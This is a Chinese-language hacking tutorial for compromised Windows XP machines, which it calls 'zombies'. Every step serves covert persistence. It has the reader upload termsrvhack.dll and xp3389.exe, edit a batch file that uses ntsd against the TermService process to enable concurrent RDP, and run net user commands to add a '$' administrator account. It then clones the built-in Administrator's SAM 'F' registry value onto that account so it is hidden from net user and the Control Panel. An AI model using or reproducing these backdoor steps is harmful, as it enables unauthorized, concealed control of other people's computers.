XP下双开3389.

所需工具： 开3389工具包（3389.bat、termsrvhack.dll、xp3389.exe）

以下是详细内容：

一、确定要开刀肉鸡，先双开3389：
1、先看下是否能远程登陆，看来 没有开，无法登陆
2、把“3389工具包”内的termsrvhack.dll和xp3389.exe 上传到肉鸡C盘根目录下
3、运行远程命令提示符，输入tasklist /svc >>c:/3389.txt
4、刷新并查看C盘刚创建的3389.txt，记下有“DcomLaunch, TermService”特征字的进程 PID值
5、更改工具包内3389.bat 中“@ntsd -c q -p”后面的数值为刚才的PID值，保持并上传至C盘
6、远程命令提示符下运行3389.bat 等待成功

二、建立隐藏管理员用户：
1、远程命令提示符下输入命令“net user 用户名$ 密码 /add” 和 “net localgroup administrators 用户名$ /add”
2、打开远程登陆工具，单击开始菜单 点击“运行” 或 windows键+R 打开运行对话框，输入“mstsc” 回车
3、填上肉鸡IP 并 连接
4、登陆后，运行注册表“regedit”修改SAM权限，即 找到“HKEY_LOCAL_MACHINE/SAM/SAM” 右键查看权限，勾上“完全控制”
5、F5刷新，找到：HKEY_LOCAL_MAICHINE/SAM/SAM/Domains/account/user/names/asp$ ，然后导出 “000001F4，000003EC、用户名$” 为1.reg、 2.reg、 3.reg
6、net user 用户名$ /del
7、将超级用户对应的项000001F4下的键"F"的值复制，并覆盖 “用户名$” 对应的项00000xxx下的键"F"的值,然后再将00000xxx与3.reg合并，并双击导入注册表
8、然后改回SAM的权限，HKEY_LOCAL_MACHINE/SAM/SAM点击右键权限（只要删除添加的帐户administrator即可）
9、到此隐藏用户建立成功
10、断开连接，重新登陆试试，成功 ~~~能登陆
看到了吧，net user 命令 看不到 asp$ 用户
控制面板也看不见